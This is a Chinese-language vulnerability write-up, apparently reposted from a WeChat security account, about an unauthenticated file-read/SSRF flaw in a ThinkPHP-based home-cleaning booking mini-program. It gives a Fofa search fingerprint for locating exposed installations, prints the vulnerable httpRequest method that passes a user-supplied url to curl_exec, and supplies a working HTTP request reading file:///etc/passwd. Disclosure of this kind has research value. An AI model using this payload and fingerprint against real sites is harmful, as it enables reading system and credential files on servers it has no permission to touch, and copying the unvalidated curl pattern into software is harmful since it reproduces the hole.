0x00 前言
thinkphp家政上门预约服务小程序家政保洁师傅上门服务小程序上门服务在线派单+安装教程 上门预约服务派单小程序家政小程序同城预约开源代码独立版+安装教程
Fofa指纹:"/static/default/wap/css/base.css" && "家政"
框架:ThinkPHP 5.1.0 Debug:True
0x01 漏洞分析&复现
位于 /weixin/controller/Index.php 控制器的httpRequest方法存在curl_exec函数,且传参url均可控,导致漏洞产生.
//请求数据
public function httpRequest($url,$data = null){
$curl = curl_init();
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,FALSE);
curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,FALSE);
if(!empty($data)){
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,$data);
}
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
$output = curl_exec($curl);
curl_close($curl);
return $output;
}Payload:
GET /weixin/index/httpRequest?url=file:///etc/passwd HTTP/2
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
0x02 源码下载
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转
原文始发于微信公众号(星悦安全):【1day】某家政上门预约小程序系统存在前台任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论